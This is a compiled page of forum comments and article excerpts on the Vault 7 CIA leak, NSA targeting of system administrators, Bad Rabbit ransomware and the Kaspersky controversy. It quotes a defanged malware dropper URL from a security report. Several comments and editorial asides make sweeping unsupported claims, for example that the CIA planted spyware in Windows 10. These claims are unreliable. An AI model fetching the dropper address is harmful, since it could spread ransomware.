What must be investigated is the incubation of a clandestine political police force inside the national security apparatus, one that has been unleashed against Trump – and could be deployed against anyone.

This isn't about Donald Trump. It's about preserving what's left of our old republic.

Perhapps overstated but well worth pondering.

SplinterItIntoAThousandPiecesAndScatterItIntoTheWinds. , March 9, 2017 at 10:06 am

Yeah I downloaded it the day it came out and spent an hour or so looking at it last night. First impressions – "heyyy this is like a Hackers Guide – the sort I used in the 80s, or DerEngel's Cable Modem Hacking" of the 00s.

2nd impressions – wow it really gives foundational stuff – like "Enable Debug on PolarSSL".

3rd impressions – "I could spend hours going thru this happily ".

4th impressions – I went looking for the "juicy bits" of interest to me – SOHO routers, small routers – sadly its just a table documenting routers sold around the world, and whether these guys have put the firmware in their Stash Repository. Original firmware, not hacked one. But the repository isn't in the vault dump, AFAIK.

Its quite fascinating. But trying to find the "juicy stuff" is going to be tedious. One can spend hours and hours going thru it. To speed up going thru it, I'm going to need some tech sites to say "where to go".

flora , March 9, 2017 at 11:21 am

It seems clear that Wikileaks has not and will not release actual ongoing method "how-to" info or hacking scripts. They are releasing the "whats", not the tech level detailed "hows". This seems like a sane approach to releasing the data. The release appears to be for political discussion, not for spreading the hacking tools. So I wouldn't look for "juicy bits" about detailed methodology. Just my guess.

That said, love what you're doing digging into this stuff. I look forward to a more detailed report in future. Thanks.

Sam F , March 9, 2017 at 10:10 am

Yves, I think that you much underestimate the extremity of these exposed violations of the security of freedom of expression, and of the security of private records. The WikiLeaks docs show that CIA has developed means to use all personal digital device microphones and cameras even when they are "off," and to send all of your files and personal data to themselves, and to send your private messages to themselves before they are encrypted. They have installed these spyware in the released version of Windows 10, and can easily install them on all common systems and devices.

This goes far beyond the kind of snooping that required specialized devices installed near the target, which could be controlled by warrant process. There is no control over this extreme spying. It is totalitarianism now.

This is probably the most extreme violation of the rights of citizens by a government in all of history. It is far worse than the "turnkey tyranny" against which Snowden warned, on the interception of private messages. It is tyranny itself, the death of democracy.

Outis Philalithopoulos , March 9, 2017 at 10:58 am

Your first sentence is a bit difficult to understand. If you read Yves' remarks introducing the post, she says that the revelations are "a big deal" "if the Wikileaks claim is even halfway true," while coming down hard on the MSM and others for "pooh-pooh[ing]" the story. Did you want her to add more exclamation points?

susan the other , March 9, 2017 at 10:59 am

So we have a zillion ways to spy and hack and deceive and assassinate, but no control. I think this is what the military refers to as "being overtaken by events."

It's easy to gather information; not so easy to analyze it, and somehow impossible to act on it in good faith. With all this ability to know stuff and surveil people the big question is, Why does everything seem so beyond our ability to control it?

We should know well in advance that banks will fail catastrophically; that we will indeed have sea level rise; that resources will run out; that water will be undrinkable; that people will be impossible to manipulate when panic hits – but what do we do? We play dirty tricks, spy on each other like voyeurs, and ignore the inevitable. Like the Stasi, we clearly know what happened, what is happening and what is going to happen. But we have no control.

NotTimothyGeithner , March 9, 2017 at 11:34 am

My godfather was in the CIA in the late sixties and early seventies, and he said that outside of the President's pet projects there was no way to sift through and bring important information to decision makers before it made the Washington Post (he is aware of the irony) and hit the President's breakfast table.

Arizona Slim , March 9, 2017 at 1:33 pm

Do you mean to say that the CIA leaked like a sieve? That's my understanding of your post.

Old Jake , March 9, 2017 at 6:05 pm

AS, I would interpret it as saying that there was so much coming in it was like trying to classify snowflakes in a snowstorm. They could pick a few subject areas to look at closely but the rest just went into the files.

Leaking like a sieve is also likely, but perhaps not the main point.

Andrew , March 9, 2017 at 11:14 am

The archive appears to have been circulated among government hackers and contractors in a authorized manner

There, that looks the more likely framing considering CIA & DNI on behalf of the whole US IC seemingly fostered wide dissimilation of these tools, information. Demonstration of media control an added plus.

Cheers Yves

Stormcrow , March 9, 2017 at 11:20 am

The Empire Strikes Back

WikiLeaks Has Joined the Trump Administration
Max Boot
Foreign Policy magazine

https://foreignpolicy.com/2017/03/08/wikileaks-has-joined-the-trump-administration/?utm_source=Sailthru&utm_medium=email&utm_campaign=New+Campaign&utm_term=%2AEditors+Picks

I guess we can only expect more of this.

Todd Pierce , on the other hand, nails it. (From his Facebook page.)
The East German Stasi could only dream of the sort of surveillance the NSA and CIA do now, with just as nefarious of purposes.

lyman alpha blob , March 9, 2017 at 11:42 am

Perhaps the scare quotes around "international mobster" aren't really necessary.

In all this talk about the various factions aligned with and against Trump, that's one I haven't heard brought up by anybody. With all the cement poured in Trump's name over the years, it would be naive to think his businesses had not brushed up against organized crime at some point. Question is, whose side are they on?

JTMcPhee , March 9, 2017 at 3:02 pm

Like all the other players, the "side" they are on is them-effing-selves. And isn't that the whole problem with our misbegotten species, writ large?

Then there's this: https://www.youtube.com/watch?v=s1Hzds9aGdA Maybe these people will be around and still eating after us urban insects and rodents are long gone? Or will our rulers decide no one should survive if they don't?

Skip Intro , March 9, 2017 at 12:55 pm

To what extent do these hacks represent the CIA operating within the US? To what extent is that illegal? With the democrats worshipping the IC, will anyone in an official position dare to speak out?

tegnost , March 9, 2017 at 1:05 pm

Well we know chuckie won't speak out..

http://thehill.com/homenews/administration/312605-schumer-trump-being-really-dumb-by-going-after-intelligence-community

FTA "Schumer said that as he understands, intelligence officials are "very upset with how [Trump] has treated them and talked about them.""

Oregoncharles , March 9, 2017 at 2:17 pm

I've long thought that the reason Snowden was pursued so passionately was that he exposed the biggest, most embarrassing secret: that the National "Security" Agency's INTERNAL security was crap.

And here it is: "Wikileaks claims that the CIA lost control of the majority of its hacking arsenal "

The CIA's internal security is crap, too. Really a lot of people should be fired over that, as well as over Snowden's release. We didn't hear of it happening in the NSA, though I'm not sure we would have. Given Gaius's description of Trump's situation, it seems unlikely it will happen this time, either. One of my hopes for a Trump administration, as long as we're stuck with it, was a thorough cleanout of the upper echelons in the IC. It's obviously long overdue, and Obama wasn't up to it. But I used the past tense because I don't think it's going to happen. Trump seems more interested in sucking up to them, presumably so they won't kill him or his family. That being one of their options.

Stephen Gardner , March 9, 2017 at 3:51 pm

Ah, that's the beauty of contracting it out. No one gets fired. Did anyone get fired because of Snowden? It was officially a contractor problem and since there are only a small number of contractors capable of doing the work, well you know. We can't get new ones.

tiebie66 , March 9, 2017 at 2:59 pm

What I find by far the most distressing is this: "The CIA had created, in effect, its "own NSA" with even less accountability ." [My emphasis]. It seems to characterize an organization that operates outside of any control and oversight – and one that is intentionally structuring itself that way. That worries me.

It is becoming increasingly clear that the Republic is lost because we didn't stand guard for it. Blaming others don't cut it either – we let it happen. And like the Germans about the Nazi atrocities, we will say that we didn't know about it.

JTMcPhee , March 9, 2017 at 3:06 pm

Hey, I didn't let it happen. Stuff that spooks and sh!tes do behind the Lycra ™ curtain happens because it is, what is the big word again, "ineluctable." Is my neighbor to blame for having his house half eaten by both kinds of termites, where the construction is such that the infestation and damage are invisible until the vast damage is done?

Stephen Gardner , March 9, 2017 at 4:08 pm

And just how were we supposed to stand guard against a secret and unaccountable organization that protected itself with a shield of lies? And every time some poor misfit complained about it they were told that they just didn't know the facts. If they only knew what our IC knows they would not complain.

It's a dangerous world out there and only our brave IC can protect us from it. Come on. Stop blaming the victim and place the blame where it belongs–our IC and MIC. I say stop feeding the beast with your loyalty to a government that has ceased to be yours.

Studiously avoid any military celebrations. Worship of the military is part of the problem. Remember, the people you thank for "their service" are as much victims as you are. Sadly they don't realize that their service is to a rotten empire that is not worthy of their sacrifice but every time we perform the obligatory ritual of thankfulness we participate in the lie that the service is to a democratic country instead of an undemocratic empire.

It's clearly a case of Wilfred Owen's classic "Dulce et Decorum Est". Read the poem, google it and read it. It is instructive: " you would not tell with such high zest To children ardent for some desperate glory, The old Lie: Dulce et decorum est Pro patria mori." Make no mistake. It is a lie and it can only be undone if we all cease to tell it.

nonsense factory , March 9, 2017 at 8:57 pm

Here's a pretty decent review of the various CIA programs revealed by Wikileaks:

http://www.libertyforjoe.com/2017/03/what-is-vault-7.html

"These CIA revelations in conjunction with those of the NSA paints a pretty dark future for privacy and freedom. Edward Snowden made us aware of the NSA's program XKEYSCORE and PRISM which are utilized to monitor and bulk collect information from virtually any electronic device on the planet and put it into a searchable database. Now Wikileaks has published what appears to be additional Big Brother techniques used by a competing agency. Say what you want about the method of discovery, but Pandora's box has been opened."

[Dec 11, 2017] Built-in keyboard loggers in modern hardware and smartphones

Dec 11, 2017 | www.unz.com

cowardly troll , December 11, 2017 at 9:16 pm GMT

@cowardly troll

Concerning point 2

https://www.rt.com/news/412778-hp-laptop-keylogger-code/

A security researcher has revealed that some HP laptops have hidden software which can log everything typed on its keypads. More than 460 models have been affected, dating back to 2012, according to the list released by HP.

And what about Android and IOS predictive "keyboards"

https://www.rt.com/news/412060-virtual-keyboard-users-exposed/

More than 31 million users of a popular virtual keyboard app AI.type, have had their private data exposed online, including email addresses, passwords, dates of birth and details from Google accounts, as well as actual text entered using the keyboard.

https://sputniknews.com/news/201605121039470344-google-apple-keyboard-app-spying/

On Android phones and iPhones you can swap out the traditional keyboards with emoji and gif-laden alternatives, but pay attention when you install third party keyboards because apps require full access. By choosing that option, developers "transmit anything you type" back to their servers.

Hu Mi Yu , December 11, 2017 at 2:41 pm GMT
@cowardly troll

Example, in 1999 I read an article in a weekly tech newspaper – maybe Information Week – about university researchers who discovered that 64 bit encrypted phones were only using the first 56 bits and the last 8 were zeros.

If you read source code, you will find other cases of security being compromised by coding "errors". This is why we are being pushed into accepting proprietary code.

cowardly troll , December 11, 2017 at 8:32 pm GMT
@Hu Mi Yu

Two points:

(1) Orwell's memory hole is real, and if you have a memory of something, but no web page to back it up, you cannot convince someone .

(2) A former government contractor says that the U.S. Federal Bureau of Investigation installed a number of back doors into the encryption software used by the OpenBSD operating system.

https://arstechnica.com/information-technology/2010/12/fbi-accused-of-planting-backdoor-in-openbsd-ipsec-stack/

https://www.pcworld.com/article/213751/former_contractor_says_fbi_put_back_door_in_openbsd.html

No word from Wikileaks or the Linux community about CIA hack:

https://sputniknews.com/science/201703071051349744-cia-anti-viruses-wikileaks/

The US Central Intelligence Agency (CIA) found different ways to penetrate the defenses set up by various well-known anti-virus programs, the WikiLeaks whistleblowing website said Tuesday.

According to the document, the CIA also devised malware targeting Microsoft Windows, Mac OS, Linux and other operating systems.

_daniel_ , December 11, 2017 at 10:35 pm GMT
You may be remembering DES:

https://en.wikipedia.org/wiki/Data_Encryption_Standard

It was a standard for many years, and it had 56 bit keys.

[Dec 01, 2017] NSA hacks system administrators, new leak reveals

Highly recommended!
"I hunt sysadm" policy is the most realosnableif you you want to get into some coporate netwrok. So republication of this three years old post is just a reminder. Any sysadmin that access corporates netwrok not from a dedicated computer using VPN (corporate laptop) is engangering the corporation. As simple as that. The level of non-professionalism demonstrated by Hillary Clinton IT staff suggests that this can be a problem in government too. After all Snowden documents now are studied by all major intelligence agencies of the world.
This also outlines the main danger of "shadow It".
Notable quotes:
"... Journalist Ryan Gallagher reported that Edward Snowden , a former sys admin for NSA contractor Booz Allen Hamilton, provided The Intercept with the internal documents, including one from 2012 that's bluntly titled "I hunt sys admins." ..."
"... "Who better to target than the person that already has the 'keys to the kingdom'?" ..."
"... "They were written by an NSA official involved in the agency's effort to break into foreign network routers, the devices that connect computer networks and transport data across the Internet," ..."
"... "By infiltrating the computers of system administrators who work for foreign phone and Internet companies, the NSA can gain access to the calls and emails that flow over their networks." ..."
"... The latest leak suggests that some NSA analysts took a much different approach when tasked with trying to collect signals intelligence that otherwise might not be easily available. According to the posts, the author advocated for a technique that involves identifying the IP address used by the network's sys admin, then scouring other NSA tools to see what online accounts used those addresses to log-in. Then by using a ..."
"... that tricks targets into installing malware by being misdirected to fake Facebook servers, the intelligence analyst can hope that the sys admin's computer is sufficiently compromised and exploited. ..."
"... Once the NSA has access to the same machine a sys admin does, American spies can mine for a trove of possibly invaluable information, including maps of entire networks, log-in credentials, lists of customers and other details about how systems are wired. In turn, the NSA has found yet another way to, in theory, watch over all traffic on a targeted network. ..."
"... "Up front, sys admins generally are not my end target. My end target is the extremist/terrorist or government official that happens to be using the network some admin takes care of," the NSA employee says in the documents. ..."
"... "A key part of the protections that apply to both US persons and citizens of other countries is the mandate that information be in support of a valid foreign intelligence requirement, and comply with US Attorney General-approved procedures to protect privacy rights." ..."
"... Coincidentally, outgoing-NSA Director Keith Alexander said last year that he was working on drastically cutting the number of sys admins at that agency by upwards of 90 percent - but didn't say it was because they could be exploited by similar tactics waged by adversarial intelligence groups. ..."
Mar 21, 2014 | news.slashdot.org

In its quest to take down suspected terrorists and criminals abroad, the United States National Security Agency has adopted the practice of hacking the system administrators that oversee private computer networks, new documents reveal.

In its quest to take down suspected terrorists and criminals abroad, the United States National Security Agency has adopted the practice of hacking the system administrators that oversee private computer networks, new documents reveal.

The Intercept has published a handful of leaked screenshots taken from an internal NSA message board where one spy agency specialist spoke extensively about compromising not the computers of specific targets, but rather the machines of the system administrators who control entire networks.

Journalist Ryan Gallagher reported that Edward Snowden, a former sys admin for NSA contractor Booz Allen Hamilton, provided The Intercept with the internal documents, including one from 2012 that's bluntly titled "I hunt sys admins."

According to the posts - some labeled "top secret" - NSA staffers should not shy away from hacking sys admins: a successful offensive mission waged against an IT professional with extensive access to a privileged network could provide the NSA with unfettered capabilities, the analyst acknowledged.

"Who better to target than the person that already has the 'keys to the kingdom'?" one of the posts reads.

"They were written by an NSA official involved in the agency's effort to break into foreign network routers, the devices that connect computer networks and transport data across the Internet," Gallagher wrote for the article published late Thursday. "By infiltrating the computers of system administrators who work for foreign phone and Internet companies, the NSA can gain access to the calls and emails that flow over their networks."

Since last June, classified NSA materials taken by Snowden and provided to certain journalists have exposed an increasing number of previously-secret surveillance operations that range from purposely degrading international encryption standards and implanting malware in targeted machines, to tapping into fiber-optic cables that transfer internet traffic and even vacuuming up data as its moved into servers in a decrypted state.

The latest leak suggests that some NSA analysts took a much different approach when tasked with trying to collect signals intelligence that otherwise might not be easily available. According to the posts, the author advocated for a technique that involves identifying the IP address used by the network's sys admin, then scouring other NSA tools to see what online accounts used those addresses to log-in. Then by using a previously-disclosed NSA tool that tricks targets into installing malware by being misdirected to fake Facebook servers, the intelligence analyst can hope that the sys admin's computer is sufficiently compromised and exploited.

Once the NSA has access to the same machine a sys admin does, American spies can mine for a trove of possibly invaluable information, including maps of entire networks, log-in credentials, lists of customers and other details about how systems are wired. In turn, the NSA has found yet another way to, in theory, watch over all traffic on a targeted network.

"Up front, sys admins generally are not my end target. My end target is the extremist/terrorist or government official that happens to be using the network some admin takes care of," the NSA employee says in the documents.

When reached for comment by The Intercept, NSA spokesperson Vanee Vines said that, "A key part of the protections that apply to both US persons and citizens of other countries is the mandate that information be in support of a valid foreign intelligence requirement, and comply with US Attorney General-approved procedures to protect privacy rights."

Coincidentally, outgoing-NSA Director Keith Alexander said last year that he was working on drastically cutting the number of sys admins at that agency by upwards of 90 percent - but didn't say it was because they could be exploited by similar tactics waged by adversarial intelligence groups. Gen. Alexander's decision came just weeks after Snowden - previously one of around 1,000 sys admins working on the NSA's networks, according to Reuters - walked away from his role managing those networks with a trove of classified information.

[Nov 05, 2017] Bad Rabbit Ten things you need to know about the latest ransomware outbreak ZDNet

Nov 05, 2017 | www.zdnet.com
It spreads via a fake Flash update on compromised websites

The main way Bad Rabbit spreads is drive-by downloads on hacked websites. No exploits are used, rather visitors to compromised websites -- some of which have been compromised since June -- are told that they need to install a Flash update. Of course, this is no Flash update, but a dropper for the malicious install.

eset-flash-update-bad-rabbit.png

A compromised website asking a user to install a fake Flash update which distributes Bad Rabbit.

Image: ESET

Infected websites -- mostly based in Russia, Bulgaria, and Turkey -- are compromised by having JavaScript injected in their HTML body or in one of their .js files.

[Nov 05, 2017] Bad Rabbit ransomware - Securelist

Nov 05, 2017 | securelist.com

What is Bad Rabbit?

Bad Rabbit is a previously unknown ransomware family.

How is Bad Rabbit distributed?

The ransomware dropper was distributed with the help of drive-by attacks . While the target is visiting a legitimate website, a malware dropper is being downloaded from the threat actor's infrastructure. No exploits were used, so the victim would have to manually execute the malware dropper, which pretends to be an Adobe Flash installer. However, our analysis confirmed that Bad Rabbit uses the EternalRomance exploit as an infection vector to spread within corporate networks. The same exploit was used in the ExPetr.

We've detected a number of compromised websites, all of which were news or media websites.

Whom does it target?

Most of the targets are located in Russia. Similar but fewer attacks have also been seen in other countries – Ukraine, Turkey and Germany. Overall, there are almost 200 targets, according to the KSN statistics.

Since when does Kaspersky Lab detect the threat?

We have been proactively detecting the original vector attack since it began on the morning of October 24. The attack lasted until midday, although ongoing attacks were detected at 19.55 Moscow time. The server from which the Bad rabbit dropper was distributed went down in the evening (Moscow time).

How is it different to ExPetr? Or it is the same malware?

Our observations suggest that this been a targeted attack against corporate networks, using methods similar to those used during the ExPetr attack . What's more, the code analysis showed a notable similarity between the code of ExPetr and Bad Rabbit binaries.

Technical details

According to our telemetry, the ransomware is spread via a drive-by attack.

The ransomware dropper is distributed from hxxp://1dnscontrol[.]com/flash_install.php

[Nov 01, 2017] Don't feed the beast. Duckduckgo is a good alternative to Google. And Facebook and Twitter's revenues are advertisement based

To abandon Amazon is unrealistic, but to control what you are buying (in view that all purchases goes into your Dossier) is probably the necessary precaution.
Google as a search engine deteriorated (Any search engine based on advertizing revenue is promoting spyware. and Google is especially bad in this respect due to its dominant position-- those guy pay Google and push themselves to the top of searches) , and alternative are not much worse, if not batter. It might make sense to change engine periodically, not to stick to a single one.
Facebook is intelligence collection company that masquerade itself as social site. So anybody who use Facebook is actually making creation of a comprehensive dossier on him/her much easier. You contacts are especially important. Same is true for Gmail and hotmail.
Notable quotes:
"... From the beginning of Zuckerberg's empire, I thought Facebook was an idiotic excuse to get people involved in trivia, even the name turned me off. ..."
Nov 01, 2017 | consortiumnews.com

geeyp, November 1, 2017 at 7:18 am

I would like to posit that we stop with the Googling on the internet. I have never "Googled" ever. Oh sure, Google is involved with connecting you when you might click on some links. That you seemingly can't avoid. I also don't Face or Twitter. If everyone could avoid doing that now, perhaps we could show our disdain with these entities acquiescing to Feinstein, et. al. I am so fed up with the Clinton crime family getting away with almost as much as the George H.W. crime family.

Skip Scott , November 1, 2017 at 8:46 am

geeyp-

That is a very good suggestion. Don't feed the beast. Duckduckgo is a good alternative to google. And facebook and twitter's revenues are add based, so don't go there either, as they have been shown to be caving to TPTB. Amazon is also one to avoid for Bezo's links to the CIA.

Jessica K , November 1, 2017 at 9:55 am

From the beginning of Zuckerberg's empire, I thought Facebook was an idiotic excuse to get people involved in trivia, even the name turned me off.

Now, Twitter is planning extending tweets to 280 characters, as if 140 is not bad enough. Unfortunately, Twitter can work to tell lies as well as push back on lies, same for Facebook and Google.

Seriously, this society has become unglued and as Lois says, "It ain't a pretty sight". Bad choices are leading to the American empire's downfall.

There's an interesting article from a week ago on Zero Hedge, "China's Rise, America's Fall", about China's launch of the petroyuan and other countries' desire to get off of dollar dominance.

Has a graph showing empire dominance from Portugal in 15th century, then Netherlands followed by Spain, then France, Great Britain, and finally the American empire, poised to be replaced by China.

[Oct 16, 2017] Yes, Your Wi-Fi Router Is Easily Hacked No, You Should Not Panic

Wifi is limited to the local area so this. So you need Trojan device to be in the reception area of your Wifi router. This is easy with public Wi-Fi routers and they are very vulnerable to this attack. home Wi-Fi routers are less vulnerable.
Notable quotes:
"... During the third step in the process, hackers can resend a key in such a way that it resets the encryption key to zero. Encryption is the process that makes your data uncrackable to anyone who might intercept it. ..."
"... With an unencrypted session, hackers are then free to pry on whatever you and your devices are doing on Wi-Fi. ..."
"... "The one saving grace is the attackers need to be within range of Wi-Fi networks," said Rudis. "But someone can sit outside your office or the apartment next door and do this attack from there." ..."
"... It's difficult to determine if any cyber criminals have used the exploit "in the wild" or are currently using it, the researchers said on their website. A demo video showed how they were able to use the attack to hack into an Android 6.0 smartphone. ..."
"... "This vulnerability has been in existence, some say, for up to 14 years -- which means that it's entirely possible someone has already determined this flaw in the past and has exploited it," he said. ..."
Oct 16, 2017 | www.msn.com

Thanks to a newly discovered security flaw, your home Wi-Fi is completely hackable, giving cyber thieves a front row seat to everything from your private chats to your baby monitor. And there's not much you can do about it -- yet.

"When I woke up this morning and saw this one, I was taken aback," Bob Rudis, chief data scientist at Rapid7, a security data and analytics company, told NBC News. "We try to make sure if something is talked about in a bad way, it actually is bad."

Called Krack, the attack takes advantage of the four-way handshake, a process between a device and a router that has been around for 14 years and is designed to deliver a fresh, encrypted session each time you get online.

During the third step in the process, hackers can resend a key in such a way that it resets the encryption key to zero. Encryption is the process that makes your data uncrackable to anyone who might intercept it.

With an unencrypted session, hackers are then free to pry on whatever you and your devices are doing on Wi-Fi.

"The one saving grace is the attackers need to be within range of Wi-Fi networks," said Rudis. "But someone can sit outside your office or the apartment next door and do this attack from there."

The Krack attack was discovered by researchers Mathy Vanhoef and Frank Piessens of KU Leuven in Belgium and was revealed on Monday.

It's a common practice in the security world to notify vendors of an exploit before it is publicly released. On their website, the researchers said they notified vendors of the products they tested on July 14. After realizing they were dealing with a protocol weakness instead of a set of bugs, the duo alerted the United States Computer Emergency Readiness Team (CERT), who began contacting vendors in August.

CERT disclosed the exploit on Monday and included a list of vendors , when they were notified, and whether they are affected. As of Monday afternoon, many were listed as "unknown."

It's difficult to determine if any cyber criminals have used the exploit "in the wild" or are currently using it, the researchers said on their website. A demo video showed how they were able to use the attack to hack into an Android 6.0 smartphone.

Google, which develops the Android operating system, is aware of the issue and "will be patching any affected devices in the coming weeks," a spokesperson said. Robert Siciliano, CEO of IDTheftSecurity.com, told NBC News "it's hard, if not impossible to say" if this attack has ever been used. However, given the amount of time the four-way handshake has been around, he believes it's possible someone has used it.

"This vulnerability has been in existence, some say, for up to 14 years -- which means that it's entirely possible someone has already determined this flaw in the past and has exploited it," he said.

[Oct 11, 2017] Elite Hackers Stealing NSA Secrets Is 'Child's Play'

What a great waste of taxpayers dollars. After Stuxnet any government that cares about secrecy does not use open, connected to internet networks for sensitive information. Some switched to typewriters, at least for highly sensitive operations, which is probably overkill. but good, old DOS can still be used to above NSA spook pretty much like typewriter; and communication via parallel port is not that easy to hack; UUCP is also pretty much available for serial port communication ;-)
But the effect on undermining the US software and hardware sales is overwhelming. Why anybody in foreign government would buy the US hardware or software, when it is clear that NSA can put a backdoor into both "before arrival". In this sense the game is over and net beneficiary might be Taiwanese and other East Asia firms as China is suspect too.
To say nothing about the effects of the US consumers and business when those tools are incorporated by criminal hacking groups into commercial malware. And this is a real dnager of NSA activities. Boomerang tends to return. And the security culture in most US companies (including government security contractors) is simply rudimentary or non existent. In no way they can withstand the attack of NSA tools. The sordid take of Hillary shadow IT and "bathroom server" is actually not an exception. Creation of "Shadow IT" is pretty common in fossilized and over-bureaucratized US enterprise It world.
Moreover operations like "Its operations that violate sovereignty of other nations, like digging into China's networks , developing the tools British spies used to break into Belgium's largest telecom, and hacking sections of the Mexican government " are clearly criminal, and are possible only due to the status of the USA as a sole of superpower. But they can result is some shipment of arms to anti-USA factions as a state-to-state retaliation. Moreover "There is no honor among thieves" and sharing of this information should be assumed is always larger then intended.
Like drone strikes they inflame anti-Americanism and has constrained U.S. foreign policy options in ways that civilian and military planners neither imagined nor anticipated.
Oct 11, 2017 | www.msn.com

The NSA's hackers have a problem.

Last week, multiple outlets reported that the NSA's elite Tailored Access Operations unit -- tasked with breaking into foreign networks -- suffered another serious data breach. The theft of computer code and other material by an employee in 2015 allowed the Russian government to more easily detect U.S. cyber operations, according to the Washington Post. It's potentially the fourth large scale incident at the NSA to be revealed in the last five years.

Now, multiple sources with direct knowledge of TAO's security procedures in the recent past tell The Daily Beast just how porous some of the defenses were to keep workers from stealing sensitive information -- either digitally or by simply walking out of the front door with it.

One source described removing data from a TAO facility as "child's play." The Daily Beast granted the sources anonymity to talk candidly about the NSA's security practices.

TAO is not your average band of hackers. Its operations have included digging into China's networks , developing the tools British spies used to break into Belgium's largest telecom, and hacking sections of the Mexican government . While other parts of the NSA may focus on tapping undersea cables or prying data from Silicon Valley giants, TAO is the tip of the NSA's offensive hacking spear, and could have access to much more sensitive information ripped from adversaries' closed networks. The unit deploys and creates sophisticated exploits that rely on vulnerabilities in routers, operating systems, and computer hardware the general population uses -- the sort of tools that could wreak havoc if they fell into the wrong hands.

That doesn't mean those tools are locked down, though. "TAO specifically had a huge amount of latitude to move data between networks," the first source, who worked at the unit after Edward Snowden's mega-leak, said. The former employee said TAO limited the number of USB drives -- which could be used to steal data -- after that 2013 breach, but he still had used several while working at TAO.

"Most operators knew how they could get anything they wanted out of the classified nets and onto the internet if they wanted to, even without the USB drives," the former TAO employee said.

A second source, who also worked at TAO, told The Daily Beast, "most of the security was your co-workers checking to see that you had your badge on you at all times."

The NSA -- and recently TAO in particular -- have suffered a series of catastrophic data breaches. On top of the Snowden incident and this newly-scrutinized 2015 breach, NSA contractor Hal Martin allegedly hoarded a trove of computer code and documents from the NSA and other agencies in the U.S. Intelligence Community. Martin worked with TAO, and he ended up storing the material in his car and residence, according to prosecutors. Like Snowden, Martin was a contractor and not an employee of the NSA, as was Reality Winner, who allegedly leaked a top-secret report about Russian interference in the U.S. election to news site The Intercept.

Then there's the incident now in the news. Israeli operatives broke into the systems of the Russian cybersecurity firm Kaspersky Lab, officials told The Washington Post. On those systems were samples of sophisticated NSA hacking tools; a TAO employee had brought them home and placed them on his home computer. That machine was running Kasperky software, which allegedly sent the NSA tools back to Moscow.

It's not totally clear how the breach overlaps with any others, but in 2016, a group called The Shadow Brokers started publishing full NSA exploit and tool code. Various hackers went on to incorporate a number of the dumped exploits in their own campaigns, including some designed to break into computers and mine digital currency, as well as the WannaCry ransomware, which crippled tens of thousands of computers around the world. (A handful of other, smaller NSA-related disclosures, including a catalogue of TAO hacking gear from 2007 and 2008, as well as intelligence intercepts, were not attributed to the Snowden documents, and the public details around where that information came from are muddy.)

Although not a data breach per se, in 2015 Kaspersky publicly revealed details on the history and tools of the so-called Equation Group, which is widely believed to be part of the NSA. A third source, who worked directly with TAO, said the fallout from that exposure meant the hacking unit entered a "significant shutdown," and "ran on minimum ops for months."

Nevertheless, a report by the Defense Department's inspector general completed in 2016 found that the NSA's "Secure the Net" project -- which aimed to restrict access to its most sensitive data after the Snowden breach -- fell short of its stated aims. The NSA did introduce some improvements, but it didn't effectively reduce the number of user accounts with 'privileged' access, which provide more avenues into sensitive data than normal users, nor fully implement technology to oversee these accounts' activities, the report reads.

Physical security wasn't much better, at least at one TAO operator's facility. He told The Daily Beast that there were "no bag checks or anything" as employees and contractors left work for the day -- meaning, it was easy smuggle things home. Metal detectors were present, including before Snowden, but "nobody cared what came out," the second source added. The third source, who visited TAO facilities, said bag checks were random and weak.

"If you have a thumb drive in your pocket, it's going to get out," they said.

Unsurprisingly, workers need to swipe keycards to access certain rooms. But, "in most cases, it's pretty easy to get into those rooms without swipe access if you just knock and say who you're trying to see," the third source added.

To be clear, The Daily Beast's sources described the state of security up to 2015 -- not today. Things may have improved since then. And, of course, the NSA and TAO do of course have an array of security protections in place. TAO operators are screened and people on campus are already going to have a high level clearance, some of the sources stressed. The part of the NSA network that TAO uses, and which contains the unit's tools, can only be accessed by those with a designated account, according to the source who worked with TAO. Two of the sources believed in the NSA's ability to track down where a file came from after a breach.

Indeed, the system TAO members use to download their hacking tools for operations has become more heavily audited over the years too, although the network did have a known security issue, in which users could make their own account and automatically gain access to additional information, the source who worked with TAO said.

"The NSA operates in one of the most complicated IT environments in the world," an NSA spokesperson told The Daily Beast in a statement. "Over the past several years, we have continued to build on internal security improvements while carrying out the mission to defend the nation and our allies."

"We do not rely on only one initiative. Instead, we have undertaken a comprehensive and layered set of defensive measures to further safeguard operations and advance best practices," the spokesperson added.

The problem of securing this data from the inside is not an easy one to solve. If the NSA was to lock down TAO systems more ferociously, that could hamper TAO's ability to effectively build tools and capabilities in the first place, and two of the sources emphasised that excessive searches would likely create a recruiting problem for the agency. "It's not prison," one of the former TAO employees said.

"The security is all predicated on you having a clearance and being trusted," the source who has worked with TAO said.

"The system is just not setup to protect against someone with a clearance who is determined to go rogue," they added.

[Oct 11, 2017] Spy Spin Fuels Anti-Kaspersky Campaign

Indiscriminate spying is a costly and not very efficient operation. The problem of drinking form a fire hose arise. So a lot of money spend by US, GB and other countries on installation of such software are wasted. If the user of such computers uses steganography this does not even allow to detect the targeted activities.
It in not that elimination of Kaspersky software from the US market (due to current anti-Russia witch hunt) is a big loss. The efficiency of AV program against new threats was always problematic. But this hysteria points to a larger problem: threat from regular hackers to your data, especially financial data and access to financial sites. I would say that the person who does not use two separate computers for browsing and for his financial and other confidential operations and data is reckless indeed. Now anybody with important financial data can afford two laptops. A good used, enterprise class, Dell laptop is around $400.
In Windows each antivirus is simultaneously a backdoor. That's given. So usage by the US government agencies of foreign AV software was an oversight; and the US government is doing the right thing to prohibit such usage. Similarly it would be highly irresponsible for, say Russian government, to use MacAfee software on government computers. Even with large transnational companies there are some tricky problems about which AV software to use. And that was the problem already understood long ago, say in 1996.
For governments any large AV company represents tremendous asset as for surveillance. Also intelligence community probably has close understanding of signature updaters and their vulnerabilities and probably have agents in each of major AV company. And for government AV signature updates are the best way to install malware on your computer. And much simpler then hijacking OS updates.
So it is only natural that AV companies are primary target of intelligence agencies. I remember being very surprised the McAfee was bought by Intel. Now I know why ;-). In the past some mass deployed AV companies software (Symantec) as well as Google software (Google bar) were spyware even without intelligence agencies interference. In a way they were pioneers of mass surveillance.
In no way linux is a panacea. This is another monstrously complex OS with multiple backdoors, especially on application level (Apache is one recent example). But it will be much less attacked by non-government hackers. This is true. Security via obscurity does work. Still if you need security against exfiltration of your data MS DOS and Windows 3.1 are also useful option (any non-networked computer actually would work; you can exchange data via parallel port too. for example Total Commander has such an option ).
Notable quotes:
"... The British spy agency regarded the Kaspersky software in particular as a hindrance to its hacking operations and sought a way to neutralize it. ..."
